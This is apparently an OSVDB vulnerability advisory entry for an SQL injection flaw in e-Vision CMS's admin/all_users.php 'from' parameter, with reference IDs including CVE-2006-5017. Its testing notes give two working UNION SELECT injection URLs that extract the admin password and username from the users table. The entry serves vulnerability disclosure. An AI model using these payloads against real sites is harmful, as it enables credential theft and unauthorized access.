e-Vision CMS admin/all_users.php from Variable SQL Injection

2006-09-22T08:18:59
ID OSVDB:29105
Type osvdb
Reporter OSVDB
Modified 2006-09-22T08:18:59

Description

Manual Testing Notes

/admin/all_users.php?from=-1%20union%20select%20null,null,null,pass,null%20from%20users%20where%20idusers=1/*

/admin/all_users.php?from=-1%20union%20select%20null,null,null,username,null%20from%20users%20where%20idusers=1/*

References:

Vendor URL: http://sourceforge.net/projects/e-vision/
Secunia Advisory ID:21969
Related OSVDB ID: 29104
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0355.html
FrSIRT Advisory: ADV-2006-3764
CVE-2006-5017
Bugtraq ID: 20147